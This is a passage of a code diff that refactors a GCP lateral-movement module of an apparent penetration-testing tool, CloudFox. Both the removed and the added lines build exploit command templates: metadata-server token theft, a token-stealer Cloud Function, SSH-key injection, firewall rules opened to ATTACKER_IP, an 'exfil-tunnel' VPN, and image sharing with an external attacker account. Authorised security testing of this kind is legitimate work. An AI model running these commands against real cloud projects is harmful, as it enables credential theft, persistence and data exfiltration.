m.getAllImpersonationChains() - allVectors := m.getAllTokenTheftVectors() - allPermBasedPaths := m.getAllPermissionBasedPaths() + // Consolidate all paths + for _, paths := range m.ProjectPaths { + m.AllPaths = append(m.AllPaths, paths...) + } // Check results - totalPaths := len(allChains) + len(allVectors) + len(allPermBasedPaths) - if totalPaths == 0 { + if len(m.AllPaths) == 0 { logger.InfoM("No lateral movement paths found", GCP_LATERALMOVEMENT_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s): %d impersonation chains, %d token theft vectors, %d permission-based", - totalPaths, len(allChains), len(allVectors), len(allPermBasedPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) + // Count by category for summary + categoryCounts := make(map[string]int) + for _, path := range m.AllPaths { + categoryCounts[path.Category]++ + } + + logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s)", len(m.AllPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) m.writeOutput(ctx, logger) } @@ -186,26 +131,19 @@ func (m *LateralMovementModule) analyzeOrgFolderLateralPaths(ctx context.Context } } else if len(orgPaths) > 0 { logger.InfoM(fmt.Sprintf("Found %d organization-level lateral movement path(s)", len(orgPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) - for _, path := range orgPaths { - orgName := orgNames[path.ScopeID] + for i := range orgPaths { + orgName := orgNames[orgPaths[i].ScopeID] if orgName == "" { - orgName = path.ScopeID + orgName = orgPaths[i].ScopeID } - lateralPath := PermissionBasedLateralPath{ - Principal: path.Principal, - PrincipalType: path.PrincipalType, - ProjectID: "org:" + path.ScopeID, - Permission: path.Method, - Category: path.Category + " (Org: " + orgName + ")", - RiskLevel: "CRITICAL", // Org-level is critical - Description: path.Description, - ExploitCommand: path.ExploitCommand, - } - // Store under a special "organization" key - m.mu.Lock() - m.ProjectPermissionBasedPaths["organization"] = append(m.ProjectPermissionBasedPaths["organization"], lateralPath) - m.mu.Unlock() + // Update the path with org context + orgPaths[i].ScopeName = orgName + orgPaths[i].RiskLevel = "CRITICAL" // Org-level is critical + orgPaths[i].PathType = "lateral" } + m.mu.Lock() + m.ProjectPaths["organization"] = append(m.ProjectPaths["organization"], orgPaths...) + m.mu.Unlock() } // Analyze folder-level IAM @@ -216,26 +154,19 @@ func (m *LateralMovementModule) analyzeOrgFolderLateralPaths(ctx context.Context } } else if len(folderPaths) > 0 { logger.InfoM(fmt.Sprintf("Found %d folder-level lateral movement path(s)", len(folderPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) - for _, path := range folderPaths { - folderName := folderNames[path.ScopeID] + for i := range folderPaths { + folderName := folderNames[folderPaths[i].ScopeID] if folderName == "" { - folderName = path.ScopeID - } - lateralPath := PermissionBasedLateralPath{ - Principal: path.Principal, - PrincipalType: path.PrincipalType, - ProjectID: "folder:" + path.ScopeID, - Permission: path.Method, - Category: path.Category + " (Folder: " + folderName + ")", - RiskLevel: "CRITICAL", // Folder-level is critical - Description: path.Description, - ExploitCommand: path.ExploitCommand, + folderName = folderPaths[i].ScopeID } - // Store under a special "folder" key - m.mu.Lock() - m.ProjectPermissionBasedPaths["folder"] = append(m.ProjectPermissionBasedPaths["folder"], lateralPath) - m.mu.Unlock() + // Update the path with folder context + folderPaths[i].ScopeName = folderName + folderPaths[i].RiskLevel = "CRITICAL" // Folder-level is critical + folderPaths[i].PathType = "lateral" } + m.mu.Lock() + m.ProjectPaths["folder"] = append(m.ProjectPaths["folder"], folderPaths...) + m.mu.Unlock() } } @@ -245,281 +176,21 @@ func (m *LateralMovementModule) analyzeOrgFolderLateralPaths(ctx context.Context func (m *LateralMovementModule) initializeLootForProject(projectID string) { if m.LootMap[projectID] == nil { m.LootMap[projectID] = make(map[string]*internal.LootFile) - m.LootMap[projectID]["impersonation-chains-commands"] = &internal.LootFile{ - Name: "impersonation-chains-commands", - Contents: "# Impersonation Chain Exploit Commands\n# Generated by CloudFox\n\n", - } - m.LootMap[projectID]["token-theft-commands"] = &internal.LootFile{ - Name: "token-theft-commands", - Contents: "# Token Theft Exploit Commands\n# Generated by CloudFox\n\n", + m.LootMap[projectID]["lateral-movement-commands"] = &internal.LootFile{ + Name: "lateral-movement-commands", + Contents: "# Lateral Movement Exploit Commands\n# Generated by CloudFox\n\n", } } } func (m *LateralMovementModule) generatePlaybook() *internal.LootFile { + // Use centralized playbook generation from attackpathService return &internal.LootFile{ - Name: "lateral-movement-playbook", - Contents: `# GCP Lateral Movement Playbook -# Generated by CloudFox -# -# This playbook provides exploitation techniques for identified lateral movement paths. - -` + m.generatePlaybookSections(), + Name: "lateral-movement-playbook", + Contents: attackpathservice.GenerateLateralPlaybook(m.AllPaths, ""), } } -func (m *LateralMovementModule) generatePlaybookSections() string { - var sections strings.Builder - - allChains := m.getAllImpersonationChains() - allVectors := m.getAllTokenTheftVectors() - allPermPaths := m.getAllPermissionBasedPaths() - - // Impersonation Chains - if len(allChains) > 0 { - sections.WriteString("## Service Account Impersonation Chains\n\n") - sections.WriteString("These principals can impersonate service accounts to gain their permissions.\n\n") - sections.WriteString("### Identified Chains:\n") - for _, chain := range allChains { - sections.WriteString(fmt.Sprintf("- %s -> %s\n", chain.StartIdentity, chain.TargetSA)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Generate access token for target SA\n") - sections.WriteString("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Create persistent key for long-term access\n") - sections.WriteString("gcloud iam service-accounts keys create key.json \\\n") - sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Use token with any gcloud command\n") - sections.WriteString("gcloud compute instances list --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") - } - - // Token Theft - Group by resource type - computeVectors := []TokenTheftVector{} - functionVectors := []TokenTheftVector{} - cloudRunVectors := []TokenTheftVector{} - gkeVectors := []TokenTheftVector{} - - for _, v := range allVectors { - switch v.ResourceType { - case "compute_instance": - computeVectors = append(computeVectors, v) - case "cloud_function": - functionVectors = append(functionVectors, v) - case "cloud_run": - cloudRunVectors = append(cloudRunVectors, v) - case "gke_cluster", "gke_nodepool": - gkeVectors = append(gkeVectors, v) - } - } - - // Compute Instance Token Theft - if len(computeVectors) > 0 { - sections.WriteString("## Compute Instance Token Theft\n\n") - sections.WriteString("These compute instances have attached service accounts whose tokens can be stolen via the metadata server.\n\n") - sections.WriteString("### Vulnerable Instances:\n") - for _, v := range computeVectors { - sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", v.ResourceName, v.ServiceAccount, v.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# SSH into the instance\n") - sections.WriteString("gcloud compute ssh INSTANCE_NAME --zone=ZONE --project=PROJECT_ID\n\n") - sections.WriteString("# Steal SA token from metadata server\n") - sections.WriteString("curl -s -H 'Metadata-Flavor: Google' \\\n") - sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") - sections.WriteString("# Get SA email\n") - sections.WriteString("curl -s -H 'Metadata-Flavor: Google' \\\n") - sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email'\n\n") - sections.WriteString("# Use token with curl\n") - sections.WriteString("TOKEN=$(curl -s -H 'Metadata-Flavor: Google' \\\n") - sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' | jq -r .access_token)\n") - sections.WriteString("curl -H \"Authorization: Bearer $TOKEN\" \\\n") - sections.WriteString(" 'https://www.googleapis.com/compute/v1/projects/PROJECT/zones/ZONE/instances'\n") - sections.WriteString("```\n\n") - } - - // Cloud Functions Token Theft - if len(functionVectors) > 0 { - sections.WriteString("## Cloud Functions Token Theft\n\n") - sections.WriteString("These Cloud Functions have attached service accounts. Deploy a malicious function to steal tokens.\n\n") - sections.WriteString("### Vulnerable Functions:\n") - for _, v := range functionVectors { - sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", v.ResourceName, v.ServiceAccount, v.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create token stealer function\n") - sections.WriteString("mkdir /tmp/fn-stealer && cd /tmp/fn-stealer\n\n") - sections.WriteString("cat > main.py << 'EOF'\n") - sections.WriteString("import functions_framework\n") - sections.WriteString("import requests\n\n") - sections.WriteString("@functions_framework.http\n") - sections.WriteString("def steal(request):\n") - sections.WriteString(" r = requests.get(\n") - sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token',\n") - sections.WriteString(" headers={'Metadata-Flavor': 'Google'})\n") - sections.WriteString(" return r.json()\n") - sections.WriteString("EOF\n\n") - sections.WriteString("echo 'functions-framework\\nrequests' > requirements.txt\n\n") - sections.WriteString("# Deploy with target SA (requires cloudfunctions.functions.create + iam.serviceAccounts.actAs)\n") - sections.WriteString("gcloud functions deploy stealer --gen2 --runtime=python311 \\\n") - sections.WriteString(" --trigger-http --allow-unauthenticated \\\n") - sections.WriteString(" --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Invoke to get token\n") - sections.WriteString("curl $(gcloud functions describe stealer --format='value(url)')\n") - sections.WriteString("```\n\n") - } - - // Cloud Run Token Theft - if len(cloudRunVectors) > 0 { - sections.WriteString("## Cloud Run Token Theft\n\n") - sections.WriteString("These Cloud Run services have attached service accounts.\n\n") - sections.WriteString("### Vulnerable Services:\n") - for _, v := range cloudRunVectors { - sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", v.ResourceName, v.ServiceAccount, v.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Deploy Cloud Run service with target SA\n") - sections.WriteString("# (requires run.services.create + iam.serviceAccounts.actAs)\n") - sections.WriteString("gcloud run deploy stealer --image=gcr.io/PROJECT/stealer \\\n") - sections.WriteString(" --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --allow-unauthenticated\n\n") - sections.WriteString("# Container code fetches token from metadata server same as compute\n") - sections.WriteString("```\n\n") - } - - // GKE Token Theft - if len(gkeVectors) > 0 { - sections.WriteString("## GKE Cluster Token Theft\n\n") - sections.WriteString("These GKE clusters have node service accounts that can be accessed from pods.\n\n") - sections.WriteString("### Vulnerable Clusters:\n") - for _, v := range gkeVectors { - sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", v.ResourceName, v.ServiceAccount, v.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Get cluster credentials\n") - sections.WriteString("gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=PROJECT\n\n") - sections.WriteString("# If Workload Identity is NOT enabled, steal node SA token from any pod:\n") - sections.WriteString("kubectl exec -it POD -- curl -s -H 'Metadata-Flavor: Google' \\\n") - sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") - sections.WriteString("# If Workload Identity IS enabled, check for pod SA token:\n") - sections.WriteString("kubectl exec -it POD -- cat /var/run/secrets/kubernetes.io/serviceaccount/token\n\n") - sections.WriteString("# List secrets for credentials\n") - sections.WriteString("kubectl get secrets -A -o yaml\n") - sections.WriteString("```\n\n") - } - - // Permission-Based Paths - Group by category - networkPaths := []PermissionBasedLateralPath{} - computeAccessPaths := []PermissionBasedLateralPath{} - dbAccessPaths := []PermissionBasedLateralPath{} - iapPaths := []PermissionBasedLateralPath{} - - for _, p := range allPermPaths { - switch { - case strings.Contains(p.Category, "Network") || strings.Contains(p.Category, "VPC"): - networkPaths = append(networkPaths, p) - case strings.Contains(p.Category, "Compute Access") || strings.Contains(p.Category, "osLogin"): - computeAccessPaths = append(computeAccessPaths, p) - case strings.Contains(p.Category, "Database"): - dbAccessPaths = append(dbAccessPaths, p) - case strings.Contains(p.Category, "IAP"): - iapPaths = append(iapPaths, p) - } - } - - // Network-based Lateral Movement - if len(networkPaths) > 0 { - sections.WriteString("## Network-Based Lateral Movement\n\n") - sections.WriteString("These principals have permissions to modify network configurations for lateral movement.\n\n") - sections.WriteString("### Principals:\n") - for _, p := range networkPaths { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", p.Principal, p.PrincipalType, p.Permission)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create VPC peering to another project\n") - sections.WriteString("gcloud compute networks peerings create pivot \\\n") - sections.WriteString(" --network=SOURCE_NETWORK \\\n") - sections.WriteString(" --peer-network=projects/TARGET_PROJECT/global/networks/TARGET_NETWORK\n\n") - sections.WriteString("# Create firewall rule to allow access\n") - sections.WriteString("gcloud compute firewall-rules create allow-pivot \\\n") - sections.WriteString(" --network=NETWORK --allow=tcp:22,tcp:3389 \\\n") - sections.WriteString(" --source-ranges=ATTACKER_IP/32\n\n") - sections.WriteString("# Create VPN tunnel to external network\n") - sections.WriteString("gcloud compute vpn-tunnels create exfil-tunnel \\\n") - sections.WriteString(" --peer-address=EXTERNAL_IP --shared-secret=SECRET \\\n") - sections.WriteString(" --ike-version=2 --target-vpn-gateway=GATEWAY\n") - sections.WriteString("```\n\n") - } - - // Compute Access Paths - if len(computeAccessPaths) > 0 { - sections.WriteString("## Compute Instance Access\n\n") - sections.WriteString("These principals can access compute instances via OS Login or metadata modification.\n\n") - sections.WriteString("### Principals:\n") - for _, p := range computeAccessPaths { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", p.Principal, p.PrincipalType, p.Permission)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# SSH via OS Login (compute.instances.osLogin)\n") - sections.WriteString("gcloud compute ssh INSTANCE --zone=ZONE --project=PROJECT\n\n") - sections.WriteString("# SSH via OS Login with sudo (compute.instances.osAdminLogin)\n") - sections.WriteString("gcloud compute ssh INSTANCE --zone=ZONE --project=PROJECT\n") - sections.WriteString("# Then run: sudo su\n\n") - sections.WriteString("# Inject SSH key via instance metadata\n") - sections.WriteString("gcloud compute instances add-metadata INSTANCE --zone=ZONE \\\n") - sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n\n") - sections.WriteString("# Inject SSH key project-wide\n") - sections.WriteString("gcloud compute project-info add-metadata \\\n") - sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n") - sections.WriteString("```\n\n") - } - - // Database Access Paths - if len(dbAccessPaths) > 0 { - sections.WriteString("## Database Access\n\n") - sections.WriteString("These principals can connect to database instances.\n\n") - sections.WriteString("### Principals:\n") - for _, p := range dbAccessPaths { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", p.Principal, p.PrincipalType, p.Permission)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Connect to Cloud SQL instance\n") - sections.WriteString("gcloud sql connect INSTANCE_NAME --user=USER --project=PROJECT\n\n") - sections.WriteString("# Create database user for persistence\n") - sections.WriteString("gcloud sql users create attacker \\\n") - sections.WriteString(" --instance=INSTANCE_NAME --password=PASSWORD\n") - sections.WriteString("```\n\n") - } - - // IAP Access Paths - if len(iapPaths) > 0 { - sections.WriteString("## IAP Tunnel Access\n\n") - sections.WriteString("These principals can access resources via Identity-Aware Proxy tunnels.\n\n") - sections.WriteString("### Principals:\n") - for _, p := range iapPaths { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", p.Principal, p.PrincipalType, p.Permission)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Start IAP tunnel to instance\n") - sections.WriteString("gcloud compute start-iap-tunnel INSTANCE 22 --zone=ZONE\n\n") - sections.WriteString("# SSH through IAP tunnel\n") - sections.WriteString("gcloud compute ssh INSTANCE --zone=ZONE --tunnel-through-iap\n\n") - sections.WriteString("# Forward port through IAP\n") - sections.WriteString("gcloud compute start-iap-tunnel INSTANCE 3306 --zone=ZONE --local-host-port=localhost:3306\n") - sections.WriteString("```\n\n") - } - - return sections.String() -} func (m *LateralMovementModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { @@ -567,23 +238,32 @@ func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, pro continue } - chain := ImpersonationChain{ - StartIdentity: creator, - TargetSA: sa.Email, - ChainLength: 1, - Path: []string{creator, sa.Email}, - RiskLevel: "HIGH", - ExploitCommand: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", sa.Email), - } - + riskLevel := "HIGH" // If target SA has roles/owner or roles/editor, it's critical if impersonationInfo.RiskLevel == "CRITICAL" { - chain.RiskLevel = "CRITICAL" + riskLevel = "CRITICAL" + } + + path := attackpathservice.AttackPath{ + Principal: creator, + PrincipalType: shared.GetPrincipalType(creator), + Method: "Impersonate (Get Token)", + TargetResource: sa.Email, + Permissions: []string{"iam.serviceAccounts.getAccessToken"}, + Category: "Service Account Impersonation", + RiskLevel: riskLevel, + Description: fmt.Sprintf("%s can impersonate %s", creator, sa.Email), + ExploitCommand: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", sa.Email), + ProjectID: projectID, + ScopeType: "project", + ScopeID: projectID, + ScopeName: m.GetProjectName(projectID), + PathType: "lateral", } m.mu.Lock() - m.ProjectImpersonationChains[projectID] = append(m.ProjectImpersonationChains[projectID], chain) - m.addImpersonationChainToLoot(chain, projectID) + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) m.mu.Unlock() } @@ -593,18 +273,26 @@ func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, pro continue } - chain := ImpersonationChain{ - StartIdentity: creator, - TargetSA: sa.Email, - ChainLength: 1, - Path: []string{creator, sa.Email}, + path := attackpathservice.AttackPath{ + Principal: creator, + PrincipalType: shared.GetPrincipalType(creator), + Method: "Create Key", + TargetResource: sa.Email, + Permissions: []string{"iam.serviceAccountKeys.create"}, + Category: "Service Account Key Creation", RiskLevel: "CRITICAL", + Description: fmt.Sprintf("%s can create keys for %s", creator, sa.Email), ExploitCommand: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", sa.Email), + ProjectID: projectID, + ScopeType: "project", + ScopeID: projectID, + ScopeName: m.GetProjectName(projectID), + PathType: "lateral", } m.mu.Lock() - m.ProjectImpersonationChains[projectID] = append(m.ProjectImpersonationChains[projectID], chain) - m.addImpersonationChainToLoot(chain, projectID) + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) m.mu.Unlock() } } @@ -651,21 +339,28 @@ func (m *LateralMovementModule) findComputeInstanceVectors(ctx context.Context, continue } - vector := TokenTheftVector{ - ResourceType: "compute_instance", - ResourceName: instance.Name, - ProjectID: projectID, - ServiceAccount: sa.Email, - AttackVector: "metadata_server", + path := attackpathservice.AttackPath{ + Principal: instance.Name, + PrincipalType: "compute_instance", + Method: "Steal Token (Metadata)", + TargetResource: sa.Email, + Permissions: []string{"compute.instances.get", "compute.instances.osLogin"}, + Category: "Compute Instance Token Theft", RiskLevel: "HIGH", + Description: fmt.Sprintf("Access to instance %s allows stealing token for %s", instance.Name, sa.Email), ExploitCommand: fmt.Sprintf(`# SSH into instance and steal token gcloud compute ssh %s --zone=%s --project=%s --command='curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"'`, instance.Name, instance.Zone, projectID), + ProjectID: projectID, + ScopeType: "project", + ScopeID: projectID, + ScopeName: m.GetProjectName(projectID), + PathType: "lateral", } m.mu.Lock() - m.ProjectTokenTheftVectors[projectID] = append(m.ProjectTokenTheftVectors[projectID], vector) - m.addTokenTheftVectorToLoot(projectID, vector) + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) m.mu.Unlock() } } @@ -749,19 +444,26 @@ gcloud functions delete token-theft-poc --region=%s --project=%s --quiet`, fn.Region, projectID, fn.Region, projectID) - vector := TokenTheftVector{ - ResourceType: "cloud_function", - ResourceName: fn.Name, - ProjectID: projectID, - ServiceAccount: fn.ServiceAccount, - AttackVector: "function_execution", + path := attackpathservice.AttackPath{ + Principal: fn.Name, + PrincipalType: "cloud_function", + Method: "Steal Token (Function)", + TargetResource: fn.ServiceAccount, + Permissions: []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs"}, + Category: "Cloud Function Token Theft", RiskLevel: "HIGH", + Description: fmt.Sprintf("Cloud Function %s runs with SA %s", fn.Name, fn.ServiceAccount), ExploitCommand: exploitCmd, + ProjectID: projectID, + ScopeType: "project", + ScopeID: projectID, + ScopeName: m.GetProjectName(projectID), + PathType: "lateral", } m.mu.Lock() - m.ProjectTokenTheftVectors[projectID] = append(m.ProjectTokenTheftVectors[projectID], vector) - m.addTokenTheftVectorToLoot(projectID, vector) + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) m.mu.Unlock() } } @@ -862,19 +564,26 @@ gcloud container images delete gcr.io/%s/token-theft-poc --quiet --force-delete- svc.Region, projectID, projectID) - vector := TokenTheftVector{ - ResourceType: "cloud_run", - ResourceName: svc.Name, - ProjectID: projectID, - ServiceAccount: svc.ServiceAccount, - AttackVector: "container_execution", + path := attackpathservice.AttackPath{ + Principal: svc.Name, + PrincipalType: "cloud_run", + Method: "Steal Token (Container)", + TargetResource: svc.ServiceAccount, + Permissions: []string{"run.services.create", "iam.serviceAccounts.actAs"}, + Category: "Cloud Run Token Theft", RiskLevel: "HIGH", + Description: fmt.Sprintf("Cloud Run service %s runs with SA %s", svc.Name, svc.ServiceAccount), ExploitCommand: exploitCmd, + ProjectID: projectID, + ScopeType: "project", + ScopeID: projectID, + ScopeName: m.GetProjectName(projectID), + PathType: "lateral", } m.mu.Lock() - m.ProjectTokenTheftVectors[projectID] = append(m.ProjectTokenTheftVectors[projectID], vector) - m.addTokenTheftVectorToLoot(projectID, vector) + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) m.mu.Unlock() } } @@ -916,19 +625,26 @@ kubectl exec -it -- curl -s -H "Metadata-Flavor: Google" "http://metadata. cluster.Name, cluster.Location, projectID) } - vector := TokenTheftVector{ - ResourceType: "gke_cluster", - ResourceName: cluster.Name, - ProjectID: projectID, - ServiceAccount: cluster.NodeServiceAccount, - AttackVector: "pod_service_account", + path := attackpathservice.AttackPath{ + Principal: cluster.Name, + PrincipalType: "gke_cluster", + Method: "Steal Token (Pod)", + TargetResource: cluster.NodeServiceAccount, + Permissions: []string{"container.clusters.getCredentials", "container.pods.exec"}, + Category: "GKE Cluster Token Theft", RiskLevel: "HIGH", + Description: fmt.Sprintf("GKE cluster %s uses node SA %s", cluster.Name, cluster.NodeServiceAccount), ExploitCommand: exploitCmd, + ProjectID: projectID, + ScopeType: "project", + ScopeID: projectID, + ScopeName: m.GetProjectName(projectID), + PathType: "lateral", } m.mu.Lock() - m.ProjectTokenTheftVectors[projectID] = append(m.ProjectTokenTheftVectors[projectID], vector) - m.addTokenTheftVectorToLoot(projectID, vector) + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) m.mu.Unlock() } } @@ -945,25 +661,32 @@ gcloud container clusters get-credentials %s --location=%s --project=%s # Exec into pod running on this node pool and steal token`, np.Name, np.ClusterName, np.Location, projectID) - vector := TokenTheftVector{ - ResourceType: "gke_nodepool", - ResourceName: fmt.Sprintf("%s/%s", np.ClusterName, np.Name), - ProjectID: projectID, - ServiceAccount: np.ServiceAccount, - AttackVector: "pod_service_account", + path := attackpathservice.AttackPath{ + Principal: fmt.Sprintf("%s/%s", np.ClusterName, np.Name), + PrincipalType: "gke_nodepool", + Method: "Steal Token (Pod)", + TargetResource: np.ServiceAccount, + Permissions: []string{"container.clusters.getCredentials", "container.pods.exec"}, + Category: "GKE Node Pool Token Theft", RiskLevel: "HIGH", + Description: fmt.Sprintf("GKE node pool %s/%s uses SA %s", np.ClusterName, np.Name, np.ServiceAccount), ExploitCommand: exploitCmd, + ProjectID: projectID, + ScopeType: "project", + ScopeID: projectID, + ScopeName: m.GetProjectName(projectID), + PathType: "lateral", } m.mu.Lock() - m.ProjectTokenTheftVectors[projectID] = append(m.ProjectTokenTheftVectors[projectID], vector) - m.addTokenTheftVectorToLoot(projectID, vector) + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) m.mu.Unlock() } } // findPermissionBasedLateralPaths identifies principals with lateral movement permissions -// This now uses the centralized attackpathService for project and resource-level analysis +// This uses the centralized attackpathService for project and resource-level analysis func (m *LateralMovementModule) findPermissionBasedLateralPaths(ctx context.Context, projectID string, logger internal.Logger) { // Use attackpathService for project-level analysis attackSvc := attackpathservice.New() @@ -976,23 +699,10 @@ func (m *LateralMovementModule) findPermissionBasedLateralPaths(ctx context.Cont return } - // Convert AttackPath to PermissionBasedLateralPath - for _, path := range paths { - lateralPath := PermissionBasedLateralPath{ - Principal: path.Principal, - PrincipalType: path.PrincipalType, - ProjectID: projectID, - Permission: path.Method, - Category: path.Category, - RiskLevel: "HIGH", // Default risk level - Description: path.Description, - ExploitCommand: path.ExploitCommand, - } - - m.mu.Lock() - m.ProjectPermissionBasedPaths[projectID] = append(m.ProjectPermissionBasedPaths[projectID], lateralPath) - m.mu.Unlock() - } + // Store paths directly (they're already AttackPath type) + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], paths...) + m.mu.Unlock() // Also analyze resource-level IAM resourcePaths, err := attackSvc.AnalyzeResourceAttackPaths(ctx, projectID, "lateral") @@ -1002,115 +712,33 @@ func (m *LateralMovementModule) findPermissionBasedLateralPaths(ctx context.Cont fmt.Sprintf("Could not analyze resource-level lateral movement permissions for project %s", projectID)) } } else { - for _, path := range resourcePaths { - lateralPath := PermissionBasedLateralPath{ - Principal: path.Principal, - PrincipalType: path.PrincipalType, - ProjectID: projectID, - Permission: path.Method, - Category: path.Category + " (Resource: " + path.ScopeName + ")", - RiskLevel: "HIGH", - Description: path.Description, - ExploitCommand: path.ExploitCommand, - } - - m.mu.Lock() - m.ProjectPermissionBasedPaths[projectID] = append(m.ProjectPermissionBasedPaths[projectID], lateralPath) - m.mu.Unlock() - } - } -} - -// generateLateralExploitCommand generates an exploit command for a lateral movement permission -func (m *LateralMovementModule) generateLateralExploitCommand(permission, projectID string) string { - switch permission { - case "compute.networks.addPeering": - return fmt.Sprintf(`# Create VPC peering to another project's network -gcloud compute networks peerings create lateral-peering \ - --network=NETWORK_NAME \ - --peer-network=projects/TARGET_PROJECT/global/networks/TARGET_NETWORK \ - --project=%s`, projectID) - case "compute.instances.osLogin": - return fmt.Sprintf(`# SSH into instance via OS Login -gcloud compute ssh INSTANCE_NAME --zone=ZONE --project=%s`, projectID) - case "compute.instances.osAdminLogin": - return fmt.Sprintf(`# SSH into instance with sudo via OS Login -gcloud compute ssh INSTANCE_NAME --zone=ZONE --project=%s -# Then: sudo su`, projectID) - case "compute.instances.setMetadata": - return fmt.Sprintf(`# Add SSH key to instance metadata -gcloud compute instances add-metadata INSTANCE_NAME --zone=ZONE \ - --metadata=ssh-keys="username:$(cat ~/.ssh/id_rsa.pub)" --project=%s`, projectID) - case "compute.projects.setCommonInstanceMetadata": - return fmt.Sprintf(`# Add SSH key to project-wide metadata (affects all instances) -gcloud compute project-info add-metadata \ - --metadata=ssh-keys="username:$(cat ~/.ssh/id_rsa.pub)" --project=%s`, projectID) - case "container.clusters.getCredentials": - return fmt.Sprintf(`# Get GKE cluster credentials -gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE --project=%s`, projectID) - case "container.pods.exec": - return fmt.Sprintf(`# Execute commands in a pod -kubectl exec -it POD_NAME -- /bin/sh`, projectID) - case "compute.firewalls.create": - return fmt.Sprintf(`# Create firewall rule to allow access -gcloud compute firewall-rules create allow-lateral \ - --network=NETWORK_NAME --allow=tcp:22,tcp:3389 \ - --source-ranges=ATTACKER_IP/32 --project=%s`, projectID) - case "cloudsql.instances.connect": - return fmt.Sprintf(`# Connect to Cloud SQL instance -gcloud sql connect INSTANCE_NAME --user=USER --project=%s`, projectID) - case "iap.tunnelInstances.accessViaIAP": - return fmt.Sprintf(`# Access instance via IAP tunnel -gcloud compute start-iap-tunnel INSTANCE_NAME PORT --zone=ZONE --project=%s`, projectID) - case "compute.images.setIamPolicy": - return fmt.Sprintf(`# Share VM image with external project -gcloud compute images add-iam-policy-binding IMAGE_NAME \ - --member='user:attacker@external.com' --role='roles/compute.imageUser' --project=%s`, projectID) - case "compute.snapshots.setIamPolicy": - return fmt.Sprintf(`# Share snapshot with external project -gcloud compute snapshots add-iam-policy-binding SNAPSHOT_NAME \ - --member='user:attacker@external.com' --role='roles/compute.storageAdmin' --project=%s`, projectID) - default: - return fmt.Sprintf("# Permission: %s\n# Refer to GCP documentation for exploitation", permission) + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], resourcePaths...) + m.mu.Unlock() } } // ------------------------------ // Loot File Management // ------------------------------ -func (m *LateralMovementModule) addImpersonationChainToLoot(chain ImpersonationChain, projectID string) { - lootFile := m.LootMap[projectID]["impersonation-chains-commands"] - if lootFile == nil { - return - } - lootFile.Contents += fmt.Sprintf( - "# Impersonation: %s -> %s\n"+ - "# Path: %s\n"+ - "%s\n\n", - chain.StartIdentity, - 